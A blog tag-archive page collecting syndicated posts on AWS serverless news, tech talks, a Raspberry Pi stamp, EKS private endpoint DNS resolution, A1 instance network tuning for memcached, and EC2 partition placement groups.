Tag Archives: Uncategorized

ICYMI: Serverless Q1 2019

Post Syndicated from Eric Johnson original https://aws.amazon.com/blogs/compute/icymi-serverless-q1-2019/

Welcome to the fifth edition of the AWS Serverless ICYMI (in case you missed it) quarterly recap. Every quarter, we share all of the most recent product launches, feature enhancements, blog posts, webinars, Twitch live streams, and other interesting things that you might have missed!

If you didn’t see them, check our previous posts for what happened in 2018:

So, what might you have missed this past quarter? Here’s the recap.

Amazon API Gateway

Amazon API Gateway improved the experience for publishing APIs on the API Gateway Developer Portal. In addition, we also added features like a search capability, feedback mechanism, and SDK-generation capabilities.

Last year, API Gateway announced support for WebSockets. As of early February 2019, it is now possible to build WebSocket-enabled APIs via AWS CloudFormation and AWS Serverless Application Model (AWS SAM). The following diagram shows an example application.WebSockets

API Gateway is also now supported in AWS Config. This feature enhancement allows API administrators to track changes to their API configuration automatically. With the power of AWS Config, you can automate alerts—and even remediation—with triggered Lambda functions.

In early January, API Gateway also announced a service level agreement (SLA) of 99.95% availability.

AWS Step Functions

Step Functions Local

AWS Step Functions added the ability to tag Step Function resources and provide access control with tag-based permissions. With this feature, developers can use tags to define access via AWS Identity and Access Management (IAM) policies.

In addition to tag-based permissions, Step Functions was one of 10 additional services to have support from the Resource Group Tagging API, which allows a single central point of administration for tags on resources.

In early February, Step Functions released the ability to develop and test applications locally using a local Docker container. This new feature allows you to innovate faster by iterating faster locally.

In late January, Step Functions joined the family of services offering SLAs with an SLA of 99.9% availability. They also increased their service footprint to include the AWS China (Ningxia) and AWS China (Beijing) Regions.

AWS SAM Command Line Interface

AWS SAM Command Line Interface (AWS SAM CLI) released the AWS Toolkit for Visual Studio Code and the AWS Toolkit for IntelliJ. These toolkits are open source plugins that make it easier to develop applications on AWS. The toolkits provide an integrated experience for developing serverless applications in Node.js (Visual Studio Code) as well as Java and Python (IntelliJ), with more languages and features to come.

The toolkits help you get started fast with built-in project templates that leverage AWS SAM to define and configure resources. They also include an integrated experience for step-through debugging of serverless applications and make it easy to deploy your applications from the integrated development environment (IDE).

AWS Serverless Application Repository

AWS Serverless Application Repository applications can now be published to the application repository using AWS CodePipeline. This allows you to update applications in the AWS Serverless Application Repository with a continuous integration and continuous delivery (CICD) process. The CICD process is powered by a pre-built application that publishes other applications to the AWS Serverless Application Repository.

AWS Event Fork Pipelines

Event Fork Pipelines

AWS Event Fork Pipelines is now available in AWS Serverless Application Repository. AWS Event Fork Pipelines is a suite of nested open-source applications based on AWS SAM. You can deploy Event Fork Pipelines directly from AWS Serverless Application Repository into your AWS account. These applications help you build event-driven serverless applications by providing pipelines for common event-handling requirements.

AWS Cloud9

Cloud9

AWS Cloud9 announced that, in addition to Amazon Linux, you can now select Ubuntu as the operating system for their AWS Cloud9 environment. Before this announcement, you would have to stand up an Ubuntu server and connect AWS Cloud9 to the instance by using SSH. With native support for Ubuntu, you can take advantage of AWS Cloud9 features, such as instance lifecycle management for cost efficiency and preconfigured tooling environments.

AWS Cloud9 also added support for AWS CloudTrail, which allows you to monitor and react to changes made to your AWS Cloud9 environment.

Amazon Kinesis Data Analytics

Amazon Kinesis Data Analytics now supports CloudTrail logging. CloudTrail captures changes made to Kinesis Data Analytics and delivers the logs to an Amazon S3 bucket. This makes it easy for administrators to understand changes made to the application and who made them.

Amazon DynamoDB

Amazon DynamoDB removed the associated costs of DynamoDB Streams used in replicating data globally. Because of their use of streams to replicate data between Regions, this translates to cost savings in global tables. However, DynamoDB streaming costs remain the same for your applications reading from a replica table’s stream.

DynamoDB added the ability to switch encryption keys used to encrypt data. DynamoDB, by default, encrypts all data at rest. You can use the default encryption, the AWS-owned customer master key (CMK), or the AWS managed CMK to encrypt data. It is now possible to change between the AWS-owned CMK and the AWS managed CMK without having to modify code or applications.

Amazon DynamoDB Local, a local installable version of DynamoDB, has added support for transactional APIs, on-demand capacity, and as many as 20 global secondary indexes per table.

AWS Amplify

Amplify Deploy

AWS Amplify added support for OAuth 2.0 Authorization Code Grant flows in the native (iOS and Android) and React Native libraries. Previously, you would have to use third-party libraries and handwritten logic to achieve these use cases.

Additionally, Amplify also launched the ability to perform instant cache invalidation and delta deployments on every code commit. To achieve this, Amplify creates unique references to all the build artifacts on each deploy. Amplify has also added the ability to detect and upload only modified artifacts at the time of release to help reduce deployment time.

Amplify also added features for multiple environments, custom resolvers, larger data models, and IAM roles, including multi-factor authentication (MFA).

AWS AppSync

AWS AppSync increased its availability footprint to the EU (London) Region.

Amazon Cognito

Amazon Cognito increased its service footprint to include the Canada (central) Region. It also published an SLA of 99.9% availability.

Amazon Aurora

Amazon Aurora Serverless increases performance visibility by publishing logs to Amazon CloudWatch.

AWS CodePipeline

CodePipeline

AWS CodePipeline announces support for deploying static files to Amazon S3. While this may not usually fall under the serverless blogs and announcements, if you’re a developer who builds single-page applications or host static websites, this makes your life easier. Your static site can now be part of your CICD process without custom coding.

Serverless Posts

January:

February:

March

Tech talks

We hold several AWS Online Tech Talks covering serverless tech talks throughout the year, so look out for them in the Serverless section of the AWS Online Tech Talks page. Here are the three tech talks that we delivered in Q1:

Whitepapers

Security Overview of AWS Lambda: This whitepaper presents a deep dive into the Lambda service through a security lens. It provides a well-rounded picture of the service, which can be useful for new adopters, as well as deepening understanding of Lambda for current users. Read the full whitepaper.

Twitch

AWS Launchpad Santa Clara

There is always something going on at our Twitch channel! Be sure and follow us so you don’t miss anything! For information about upcoming broadcasts and recent livestreams, keep an eye on AWS on Twitch for more Serverless videos and on the Join us on Twitch AWS page.

In other news

Building Happy Little APIs

Twitch Series: Building Happy Little APIs

In April, we started a 13-week deep dive into building APIs on AWS as part of our Twitch Build On series. The Building Happy Little APIs series covers the common and not-so-common use cases for APIs on AWS and the features available to customers as they look to build secure, scalable, efficient, and flexible APIs.

Twitch series: Build on Serverless: Season 2

Build On Serverless

Join Heitor Lessa across 14 weeks, nearly every Wednesday from April 24 – August 7 at 8AM PST/11AM EST/3PM UTC. Heitor is live-building a full-stack, serverless airline-booking application using a bunch of services: Lambda, Amplify, API Gateway, Amazon Cognito, AWS SAM, CloudWatch, AWS AppSync, and others. See the episode guide and sign up for stream reminders.

2019 AWS Summits

AWS Summit

The 2019 schedule is in full swing for 2019 AWS Global Summits held in major cities around the world. These free events bring the cloud computing community together to connect, collaborate, and learn about AWS. They attract technologists from all industries and skill levels who want to discover how AWS can help them innovate quickly and deliver flexible, reliable solutions at scale. Get notified when to register and learn more at the AWS Global Summit Program website.

Still looking for more?

The Serverless landing page has lots of information. The Lambda resources page contains case studies, webinars, whitepapers, customer stories, reference architectures, and even more Getting Started tutorials. Check it out!

Learn about AWS Services & Solutions – May AWS Online Tech Talks

Post Syndicated from Robin Park original https://aws.amazon.com/blogs/aws/learn-about-aws-services-solutions-may-aws-online-tech-talks/

AWS Tech Talks

Join us this May to learn about AWS services and solutions. The AWS Online Tech Talks are live, online presentations that cover a broad range of topics at varying technical levels. These tech talks, led by AWS solutions architects and engineers, feature technical deep dives, live demonstrations, customer examples, and Q&A with AWS experts. Register Now!

Note – All sessions are free and in Pacific Time.

Tech talks this month:

Compute

May 30, 2019 | 11:00 AM – 12:00 PM PTYour First HPC Cluster on AWS – Get a step-by-step walk-through of how to set up your first HPC cluster on AWS.

Containers

May 20, 2019 | 11:00 AM – 12:00 PM PTManaging Application Deployments with the AWS Service Operator – Learn how the AWS Service Operator helps you provision AWS resources and your applications using kubectl CLI.

May 22, 2019 | 9:00 AM – 10:00 AM PT Microservice Deployment Strategies with AWS App Mesh – Learn how AWS App Mesh makes the process of deploying microservices on AWS easier and more reliable while providing you with greater control and visibility to support common deployment patterns.

Data Lakes & Analytics

May 20, 2019 | 9:00 AM – 10:00 AM PTEKK is the New ELK: Aggregating, Analyzing and Visualizing Logs – Learn how to aggregate, analyze, & visualize your logs with Amazon Elasticsearch Service, Amazon Kinesis Data Firehose, and Kibana

May 22, 2019 | 11:00 AM – 12:00 PM PTBuilding a Data Streaming Application Leveraging Apache Flink – Learn how to build and manage a real-time streaming application with AWS using Java and leveraging Apache Flink.

Databases

May 20, 2019 | 1:00 PM – 2:00 PM PTMigrating to Amazon DocumentDB – Learn how to migrate MongoDB workloads to Amazon DocumentDB, a fully managed MongoDB compatible database service designed from the ground up to be fast, scalable, and highly available.

May 29, 2019 | 1:00 PM – 2:00 PM PTAWS Fireside Chat: Optimize Your Business Continuity Strategy with Aurora Global Database – Join us for a discussion with the General Manager of Amazon Aurora to learn how you can use Aurora Global Database to build scalable and reliable apps.

DevOps

May 21, 2019 | 9:00 AM – 10:00 AM PTInfrastructure as Code Testing Strategies with AWS CloudFormation – Learn about CloudFormation testing best practices, including what tools to use and when, both while authoring code and while testing in a continuous integration and continuous delivery pipeline.

End-User Computing

May 23, 2019 | 1:00 PM – 2:00 PM PTManaging Amazon Linux WorkSpaces at Scale using AWS OpsWorks for Chef Automate – Learn how to simplify your Amazon Linux Workspaces management at scale by integrating with AWS OpsWorks for Chef Automate.

Enterprise & Hybrid

May 28, 2019 | 11:00 AM – 12:00 PM PTWhat’s New in AWS Landing Zone – Learn how the AWS Landing Zone can automate the setup of best practice baselines when setting up new AWS environments.

IoT

May 29, 2019 | 11:00 AM – 12:30 PM PTCustomer Showcase: Extending Machine Learning to Industrial IoT Applications at the Edge – Learn how AWS IoT customers are building smarter products and bringing them to market quickly with Amazon FreeRTOS and AWS IoT Greengrass.

Machine Learning

May 28, 2019 | 9:00 AM – 10:00 AM PTBuild a Scalable Architecture to Automatically Extract and Import Form Data – Learn how to build a scalable architecture to process thousands of forms or documents with Amazon Textract.

May 30, 2019 | 1:00 PM – 2:00 PM PTBuild Efficient and Accurate Recommendation Engines with Amazon Personalize – Learn how to build efficient and accurate recommendation engines with high impact to the bottom line of your business.

Mobile

May 21, 2019 | 1:00 PM – 2:00 PM PTDeploying and Consuming Serverless Functions with AWS Amplify – Learn how to build and deploy serverless applications using React and AWS Amplify.

Networking & Content Delivery

May 31, 2019 | 1:00 PM – 2:00 PM PTSimplify and Scale How You Connect Your Premises to AWS with AWS Direct Connect on AWS Transit Gateway – Learn how to use multi account Direct Connect gateway to interface your on-premises network with your AWS network through a AWS Transit Gateway.

Security, Identity, & Compliance

May 30, 2019 | 9:00 AM – 10:00 AM PTGetting Started with Cross-Account Encryption Using AWS KMS, Featuring Slack Enterprise Key Management – Learn how to manage third-party access to your data keys with AWS KMS.

May 31, 2019 | 9:00 AM – 10:00 AM PTAuthentication for Your Applications: Getting Started with Amazon Cognito – Learn how to use Amazon Cognito to add sign up and sign in to your web or mobile application.

Serverless

May 22, 2019 | 1:00 PM – 2:00 PM PTBuilding Event-Driven Serverless Apps with AWS Event Fork Pipelines – Learn how to use Event Fork Pipelines, a new suite of open-source nested applications in the serverless application repository, to easily build event driven apps.

Storage

May 28, 2019 | 1:00 PM – 2:00 PM PTBriefing: AWS Hybrid Cloud Storage and Edge Computing – Learn about AWS hybrid cloud storage and edge computing capabilities.

May 23, 2019 | 11:00 AM – 12:00 PM PTManaging Tens to Billions of Objects at Scale with S3 Batch Operations – Learn about S3 Batch Operations and how to manage billions of objects with a single API request in a few clicks.

We’re on a stamp!

Post Syndicated from Liz Upton original https://www.raspberrypi.org/blog/were-on-a-stamp/

The Royal Mail is issuing a series of six stamps celebrating 50 years of British Engineering this week (available from 2 May). We’re absolutely made up to be one of the engineering projects chosen: we’re in some exalted company.

This series is also celebrating the 50th anniversary of the Royal Academy of Engineering’s MacRobert Award, which Raspberry Pi won in 2017. (I had had a baby what felt like about five minutes before the photos from the MacRobert Award presentation ceremony were taken, so please don’t judge.) The Raspberry Pi stamp sits alongside stamps featuring the Falkirk Wheel, catalytic converters, Crossrail, CT scanners, and synthetic bone grafts. We don’t envy the people having to make the choices about what to put on stamps like this: how do you sift through fifty years of great engineering in a country like Great Britain that produces so much to admire? We’re very proud to have been included — and we’re buying a huge stack of them to use on all our post for the foreseeable future.

You can buy your own presentation pack at the Royal Mail website (or at Post Offices) from Wednesday 2 May; or you can pre-order now. We’re a little sad that British stamps now come with a sticky back, so we won’t be able to imagine all of you gently licking the back of a Raspberry Pi, but otherwise we’re absolutely made up.

The post We’re on a stamp! appeared first on Raspberry Pi.

Enabling DNS resolution for Amazon EKS cluster endpoints

Post Syndicated from Anuneet Kumar original https://aws.amazon.com/blogs/compute/enabling-dns-resolution-for-amazon-eks-cluster-endpoints/

This post is contributed by Jeremy Cowan – Sr. Container Specialist Solution Architect, AWS

By default, when you create an Amazon EKS cluster, the Kubernetes cluster endpoint is public. While it is accessible from the internet, access to the Kubernetes cluster endpoint is restricted by AWS Identity and Access Management (IAM) and Kubernetes role-based access control (RBAC) policies.

At some point, you may need to configure the Kubernetes cluster endpoint to be private.  Changing your Kubernetes cluster endpoint access from public to private completely disables public access such that it can no longer be accessed from the internet.

In fact, a cluster that has been configured to only allow private access can only be accessed from the following:

  • The VPC where the worker nodes reside
  • Networks that have been peered with that VPC
  • A network that has been connected to AWS through AWS Direct Connect (DX) or a virtual private network (VPN)

However, the name of the Kubernetes cluster endpoint is only resolvable from the worker node VPC, for the following reasons:

  • The Amazon Route 53 private hosted zone that is created for the endpoint is only associated with the worker node VPC.
  • The private hosted zone is created in a separate AWS managed account and cannot be altered.

For more information, see Working with Private Hosted Zones.

This post explains how to use Route 53 inbound and outbound endpoints to resolve the name of the cluster endpoints when a request originates outside the worker node VPC.

Route 53 inbound and outbound endpoints

Route 53 inbound and outbound endpoints allow you to simplify the configuration of hybrid DNS.  DNS queries for AWS resources are resolved by Route 53 resolvers and DNS queries for on-premises resources are forwarded to an on-premises DNS resolver. However, you can also use these Route 53 endpoints to resolve the names of endpoints that are only resolvable from within a specific VPC, like the EKS cluster endpoint.

The following diagrams show how the solution works:

  • A Route 53 inbound endpoint is created in each worker node VPC and associated with a security group that allows inbound DNS requests from external subnets/CIDR ranges.
  • If the requests for the Kubernetes cluster endpoint originate from a peered VPC, those requests must be routed through a Route 53 outbound endpoint.
  • The outbound endpoint, like the inbound endpoint, is associated with a security group that allows inbound requests that originate from the peered VPC or from other VPCs in the Region.
  • A forwarding rule is created for each Kubernetes cluster endpoint.  This rule routes the request through the outbound endpoint to the IP addresses of the inbound endpoints in the worker node VPC, where it is resolved by Route 53.
  • The results of the DNS query for the Kubernetes cluster endpoint are then returned to the requestor.

If the request originates from an on-premises environment, you forego creating the outbound endpoints. Instead, you create a forwarding rule to forward requests for the Kubernetes cluster endpoint to the IP address of the Route 53 inbound endpoints in the worker node VPC.

Solution overview

For this solution, follow these steps:

  • Create an inbound endpoint in the worker node VPC.
  • Create an outbound endpoint in a peered VPC.
  • Create a forwarding rule for the outbound endpoint that sends requests to the Route 53 resolver for the worker node VPC.
  • Create a security group rule to allow inbound traffic from a peered network.
  • (Optional) Create a forwarding rule in your on-premises DNS for the Kubernetes cluster endpoint.

Prerequisites

EKS requires that you enable DNS hostnames and DNS resolution in each worker node VPC when you change the cluster endpoint access from public to private.  It is also a prerequisite for this solution and for all solutions that uses Route 53 private hosted zones.

In addition, you need a route that connects your on-premises network or VPC with the worker node VPC.  In a multi-VPC environment, this can be accomplished by creating a peering connection between two or more VPCs and updating the route table in those VPCs. If you’re connecting from an on-premises environment across a DX or an IPsec VPN, you need a route to the worker node VPC.

Configuring the inbound endpoint

When you provision an EKS cluster, EKS automatically provisions two or more cross-account elastic network interfaces onto two different subnets in your worker node VPC.  These network interfaces are primarily used when the control plane must initiate a connection with your worker nodes, for example, when you use kubectl exec or kubectl proxy. However, they can also be used by the workers to communicate with the Kubernetes API server.

When you change the EKS endpoint access to private, EKS associates a Route 53 private hosted zone with your worker node VPC.  Within this private hosted zone, EKS creates resource records for the cluster endpoint. These records correspond to the IP addresses of the two cross-account elastic network interfaces that were created in your VPC when you provisioned your cluster.

When the IP addresses of these cross-account elastic network interfaces change, for example, when EKS replaces unhealthy control plane nodes, the resource records for the cluster endpoint are automatically updated. This allows your worker nodes to continue communicating with the cluster endpoint when you switch to private access.  If you update the cluster to enable public access and disable private access, your worker nodes revert to using the public Kubernetes cluster endpoint.

By creating a Route 53 inbound endpoint in the worker node VPC, DNS queries are sent to the VPC DNS resolver of worker node VPC.  This endpoint is now capable of resolving the cluster endpoint.

Create an inbound endpoint in the worker node VPC

  1. In the Route 53 console, choose Inbound endpoints, Create Inbound endpoint.
  2. For Endpoint Name, enter a value such as <cluster_name>InboundEndpoint.
  3. For VPC in the Region, choose the VPC ID of the worker node VPC.
  4. For Security group for this endpoint, choose a security group that allows clients or applications from other networks to access this endpoint. For an example, see the Route 53 resolver diagram shown earlier in the post.
  5. Under IP addresses section, choose an Availability Zone that corresponds to a subnet in your VPC.
  6. For IP address, choose Use an IP address that is selected automatically.
  7. Repeat steps 7 and 8 for the second IP address.
  8. Choose Submit.

Or, run the following AWS CLI command:

export DATE=$(date +%s)
export INBOUND_RESOLVER_ID=$(aws route53resolver create-resolver-endpoint --name 
<name> --direction INBOUND --creator-request-id $DATE --security-group-ids <sgs> \
--ip-addresses SubnetId=<subnetId>,Ip=<IP address> SubnetId=<subnetId>,Ip=<IP address> \
| jq -r .ResolverEndpoint.Id)
aws route53resolver list-resolver-endpoint-ip-addresses --resolver-endpoint-id \
$INBOUND_RESOLVER_ID | jq .IpAddresses[].Ip

This outputs the IP addresses assigned to the inbound endpoint.

When you are done creating the inbound endpoint, select the endpoint from the console and choose View details.  This shows you a summary of the configuration for the endpoint.  Record the two IP addresses that were assigned to the inbound endpoint, as you need them later when configuring the forwarding rule.

Connecting from a peered VPC

An outbound endpoint is used to send DNS requests that cannot be resolved “locally” to an external resolver based on a set of rules.

If you are connecting to the EKS cluster from a peered VPC, create an outbound endpoint and forwarding rule in that VPC or expose an outbound endpoint from another VPC. For more information, see Forwarding Outbound DNS Queries to Your Network.

Create an outbound endpoint

  1. In the Route 53 console, choose Outbound endpoints, Create outbound endpoint.
  2. For Endpoint name, enter a value such as <cluster_name>OutboundEnpoint.
  3. For VPC in the Region, select the VPC ID of the VPC where you want to create the outbound endpoint, for example the peered VPC.
  4. For Security group for this endpoint, choose a security group that allows clients and applications from this or other network VPCs to access this endpoint. For an example, see the Route 53 resolver diagram shown earlier in the post.
  5. Under the IP addresses section, choose an Availability Zone that corresponds to a subnet in the peered VPC.
  6. For IP address, choose Use an IP address that is selected automatically.
  7. Repeat steps 7 and 8 for the second IP address.
  8. Choose Submit.

Or, run the following AWS CLI command:

export DATE=$(date +%s)
export OUTBOUND_RESOLVER_ID=$(aws route53resolver create-resolver-endpoint --name 
<name> --direction OUTBOUND --creator-request-id $DATE --security-group-ids <sgs> \
--ip-addresses SubnetId=<subnetId>,Ip=<IP address> SubnetId=<subnetId>,Ip=<Ip address> \
| jq -r .ResolverEndpoint.Id)
aws route53resolver list-resolver-endpoint-ip-addresses --resolver-endpoint-id \
$OUTBOUND_RESOLVER_ID | jq .IpAddresses[].Ip

This outputs the IP addresses that get assigned to the outbound endpoint.

Create a forwarding rule for the cluster endpoint

A forwarding rule is used to send DNS requests that cannot be resolved by the local resolver to another DNS resolver.  For this solution to work, create a forwarding rule for each cluster endpoint to resolve through the outbound endpoint. For more information, see Values That You Specify When You Create or Edit Rules.

  1. In the Route 53 console, choose Rules, Create rule.
  2. Give your rule a name, such as <cluster_name>Rule.
  3. For Rule type, choose Forward.
  4. For Domain name, type the name of the cluster endpoint for your EKS cluster.
  5. For VPCs that use this rule, select all of the VPCs to which this rule should apply.  If you have multiple VPCs that must access the cluster endpoint, include them in the list of VPCs.
  6. For Outbound endpoint, select the outbound endpoint to use to send DNS requests to the inbound endpoint of the worker node VPC.
  7. Under the Target IP addresses section, enter the IP addresses of the inbound endpoint that corresponds to the EKS endpoint that you entered in the Domain name field.
  8. Choose Submit.

Or, run the following AWS CLI command:

export DATE=$(date +%s)
aws route53resolver create-resolver-rule --name <name> --rule-type FORWARD \
--creator-request-id $DATE --domain-name <cluster_endpoint> --target-ips \
Ip=<IP of inbound endpoint>,Port=53 --resolver-endpoint-id <Id of outbound endpoint>

Accessing the cluster endpoint

After creating the inbound and outbound endpoints and the DNS forwarding rule, you should be able to resolve the name of the cluster endpoints from the peered VPC.

$ dig 9FF86DB0668DC670F27F426024E7CDBD.sk1.us-east-1.eks.amazonaws.com 

; <<>> DiG 9.8.2rc1-RedHat-9.8.2-0.68.rc1.58.amzn1 <<>> 9FF86DB0668DC670F27F426024E7CDBD.sk1.us-east-1.eks.amazonaws.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 7168
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;9FF86DB0668DC670F27F426024E7CDBD.sk1.us-east-1.eks.amazonaws.com. IN A
;; ANSWER SECTION:
9FF86DB0668DC670F27F426024E7CDBD.sk1.us-east-1.eks.amazonaws.com. 60 IN A 192.168.109.77
9FF86DB0668DC670F27F426024E7CDBD.sk1.us-east-1.eks.amazonaws.com. 60 IN A 192.168.74.42
;; Query time: 12 msec
;; SERVER: 172.16.0.2#53(172.16.0.2)
;; WHEN: Mon Apr 8 22:39:05 2019
;; MSG SIZE rcvd: 114

Before you can access the cluster endpoint, you must add the IP address range of the peered VPCs to the EKS control plane security group. For more information, see Tutorial: Creating a VPC with Public and Private Subnets for Your Amazon EKS Cluster.

Add a rule to the EKS cluster control plane security group

  1. In the EC2 console, choose Security Groups.
  2. Find the security group associated with the EKS cluster control plane.  If you used eksctl to provision your cluster, the security group is named as follows: eksctl-<cluster_name>-cluster/ControlPlaneSecurityGroup.
  3. Add a rule that allows port 443 inbound from the CIDR range of the peered VPC.
  4. Choose Save.

Run kubectl

With the proper security group rule in place, you should now be able to issue kubectl commands from a machine in the peered VPC against the cluster endpoint.

$ kubectl get nodes
NAME                             STATUS    ROLES     AGE       VERSION
ip-192-168-18-187.ec2.internal   Ready     <none>    22d       v1.11.5
ip-192-168-61-233.ec2.internal   Ready     <none>    22d       v1.11.5

Connecting from an on-premises environment

To manage your EKS cluster from your on-premises environment, configure a forwarding rule in your on-premises DNS to forward DNS queries to the inbound endpoint of the worker node VPCs. I’ve provided brief descriptions for how to do this for BIND, dnsmasq, and Windows DNS below.

Create a forwarding zone in BIND for the cluster endpoint

Add the following to the BIND configuration file:

zone "<cluster endpoint FQDN>" {
    type forward;
    forwarders { <inbound endpoint IP #1>; <inbound endpoint IP #2>; };
};

Create a forwarding zone in dnsmasq for the cluster endpoint

If you’re using dnsmasq, add the --server=/<cluster endpoint FQDN>/<inbound endpoint IP> flag to the startup options.

Create a forwarding zone in Windows DNS for the cluster endpoint

If you’re using Windows DNS, create a conditional forwarder.  Use the cluster endpoint FQDN for the DNS domain and the IPs of the inbound endpoints for the IP addresses of the servers to which to forward the requests.

Add a security group rule to the cluster control plane

Follow the steps in Adding A Rule To The EKS Cluster Control Plane Security Group. This time, use the CIDR of your on-premises network instead of the peered VPC.

Conclusion

When you configure the EKS cluster endpoint to be private only, its name can only be resolved from the worker node VPC. To manage the cluster from another VPC or your on-premises network, you can use the solution outlined in this post to create an inbound resolver for the worker node VPC.

This inbound endpoint is a feature that allows your DNS resolvers to easily resolve domain names for AWS resources. That includes the private hosted zone that gets associated with your VPC when you make the EKS cluster endpoint private. For more information, see Resolving DNS Queries Between VPCs and Your Network.  As always, I welcome your feedback about this solution.

Optimizing Network Intensive Workloads on Amazon EC2 A1 Instances

Post Syndicated from Martin Yip original https://aws.amazon.com/blogs/compute/optimizing-network-intensive-workloads-on-amazon-ec2-a1-instances/

This post courtesy of Ali Saidi, AWS, Principal Engineer

At re:Invent 2018, AWS announced the Amazon EC2 A1 instance. The A1 instances are powered by our internally developed Arm-based AWS Graviton processors and are up to 45% less expensive than other instance types with the same number of vCPUs and DRAM. These instances are based on the AWS Nitro System, and offer enhanced-networking of up to 10 Gbps with Elastic Network Adapters (ENA).

One of the use cases for the A1 instance is key-value stores and in this post, we describe how to get the most performance from the A1 instance running memcached. Some simple configuration options increase the performance of memcached by 3.9X over the out-of-the-box experience as we’ll show below. Although we focus on memcached, the configuration advice is similar for any network intensive workload running on A1 instances. Typically, the performance of network intensive workloads will improve by tuning some of these parameters, however depending on the particular data rates and processing requirements the values below could change.

irqbalance

Most Linux distributions enable irqbalance by default which load-balance interrupts to different CPUs during runtime. It does a good job to balance interrupt load, but in some cases, we can do better by pinning interrupts to specific CPUs. For our optimizations we’re going to temporarily disable irqbalance, however, if this is a production configuration that needs to survive a server reboot, irqbalance would need to be permanently disabled and the changes below would need to be added to the boot sequence.

Receive Packet Steering (RPS)

RPS controls which CPUs process packets are received by the Linux networking stack (softIRQs). Depending on instance size and the amount of application processing needed per packet, sometimes the optimal configuration is to have the core receiving packets also execute the Linux networking stack, other times it’s better to spread the processing among a set of cores. For memcached on EC2 A1 instances, we found that using RPS to spread the load out is helpful on the larger instance sizes.

Networking Queues

A1 instances with medium, large, and xlarge instance sizes have a single queue to send and receive packets while 2xlarge and 4xlarge instance sizes have two queues. On the single queue droplets, we’ll pin the IRQ to core 0, while on the dual-queue droplets we’ll use either core 0 or core 0 and core 8.

Instance TypeIRQ settingsRPS settingsApplication settings
a1.xlargeCore 0Core 0Run on cores 1-3
a1.2xlargeBoth on core 0Core 0-3, 4-7Run on core 1-7
a1.4xlargeCore 0 and core 8Core 0-7, 8-15Run on cores 1-7 and 9-15

 

 

 

 

 

The following script sets up the Linux kernel parameters:

#!/bin/bash 

sudo systemctl stop irqbalance.service
set_irq_affinity() {
  grep eth0 /proc/interrupts | awk '{print $1}' | tr -d : | while read IRQ; 
do
    sudo sh -c "echo $1 > /proc/irq/$IRQ/smp_affinity_list"
    shift
  done
}
 
case `grep ^processor /proc/cpuinfo  | wc -l ` in
  (4) sudo sh -c 'echo 1 > /sys/class/net/eth0/queues/rx-0/rps_cpus'
      set_irq_affinity 0
      ;;
  (8) sudo sh -c 'echo f > /sys/class/net/eth0/queues/rx-0/rps_cpus'
      sudo sh -c 'echo f0 > /sys/class/net/eth0/queues/rx-0/rps_cpus'
      set_irq_affinity 0 0
      ;;
  (16) sudo sh -c 'echo ff > /sys/class/net/eth0/queues/rx-0/rps_cpus'
      sudo sh -c 'echo ff00 > /sys/class/net/eth0/queues/rx-0/rps_cpus'
      set_irq_affinity 0 08
      ;;
  *)  echo "Script only supports 4, 8, 16 cores on A1 instances"
      exit 1;
      ;;
esac

Summary

Some simple tuning parameters can significantly improve the performance of network intensive workloads on the A1 instance. With these changes we get 3.9X the performance on an a1.4xlarge and the other two instance sizes see similar improvements. While the particular values listed here aren’t applicable to all network intensive benchmarks, this article demonstrates the methodology and provides a starting point to tune the system and balance the load across CPUs to improve performance. If you have questions about your own workload running on A1 instances, please don’t hesitate to get in touch with us at [email protected] .

Using partition placement groups for large distributed and replicated workloads in Amazon EC2

Post Syndicated from Roshni Pary original https://aws.amazon.com/blogs/compute/using-partition-placement-groups-for-large-distributed-and-replicated-workloads-in-amazon-ec2/

This post is contributed by Ankit Jain – Sr. Product Manager, Amazon EC2 and Harsha Warrdhan Sharma – Global Account Solutions Architect at AWS

Before we introduced partition placement groups, customers deployed large distributed and replicated workloads across multiple Availability Zones to reduce correlated failures. This new Amazon EC2 placement strategy helps reduce the likelihood of correlated failures for workloads such as Hadoop, HBase, Cassandra, Kafka, and Aerospike running on EC2.

While Multi-AZ deployment offers high availability, some workloads are more sensitive to internode latency and could not be deployed across multiple zones. With partition placement groups, you can now deploy these workloads within a single zone and reduce the likelihood of correlated failures, improving your application performance and availability.

Placement group overview

Placement groups enable you to influence how your instances are placed on the underlying hardware. EC2 offers different types of placement groups to address different types of workloads. Use cluster placement groups that enable applications to achieve a low-latency network performance, necessary for tightly coupled node-to-node communication, typical of many HPC applications. Or, use spread placement groups to place a small number of critical instances on distinct racks, reducing correlated failures for your applications.

While spread placement groups work well for small workloads, customers wanted a way to reduce correlated failures for large distributed and replicated workloads that required hundreds of EC2 instances. They also wanted visibility into how instances are placed relative to each other on the underlying hardware. To address these needs, we introduced partition placement groups.

How partition placement groups work

To isolate the impact of hardware faults, EC2 subdivides each partition placement group, into logical segments called partitions. EC2 ensures that no two partitions within a placement group share the same racks. The following diagram shows a partition placement group in a single zone:

Applications such as Hadoop, HBase, Cassandra, Kafka, and Aerospike have replicated nodes for fault tolerance and use the topology information to make intelligent data storage decisions. With partition placement groups, EC2 can place the replicated nodes across separate racks in a zone and isolate the risk of hardware failure to only one node. In addition, partition placement groups offer visibility into the partitions that allows these rack-aware applications to make intelligent data replication decisions, increasing data availability and durability.

Deploying applications using partition placement groups

Here’s an example of how to use a partition placement group through the AWS Management Console or AWS CLI.

First, in the console, choose EC2, Placement Group, create a partition placement group, and then define the number of partitions within that placement group. When creating a partition placement group, we recommend mirroring the replication factor of your application and the number of partitions that you run in that placement group. For instance, if a Hadoop cluster has a replication factor of 3, then you should define a partition placement group with three partitions.

You can also run the following AWS CLI command to perform the same action:

aws ec2 create-placement-group --group-name HDFS-GROUP-A --strategy partition --partition-count 3

After defining the placement group, launch the desired number of EC2 instances into this placement group from the EC2 launch instance wizard.

If you specify Auto distribution for the Target partition field at the time of launch, EC2 tries to evenly distribute all instances across the partitions. For example, a node might consist of 100 EC2 instances and there could be three such replicated nodes in your application. You can launch 300 EC2 instances, select the partition placement group, and keep Auto distribution as the default. Each partition then has approximately 100 instances, with each partition running on a separate group of racks.

Run the following command (auto distribution is the default behavior):

aws ec2 run-instances --placement "GroupName = HDFS-GROUP-A" --count 300

Alternatively, you can specify a target partition number at launch. As your workload grows, this feature makes it easy to maintain the placement group. You can replace instances in a specified partition or add more instances to a specified partition, using the Target partition field.

Run the following command and specify PartitionNumber:

aws ec2 run-instances --placement "GroupName = HDFS-GROUP-A, PartitionNumber = 1" --count 100

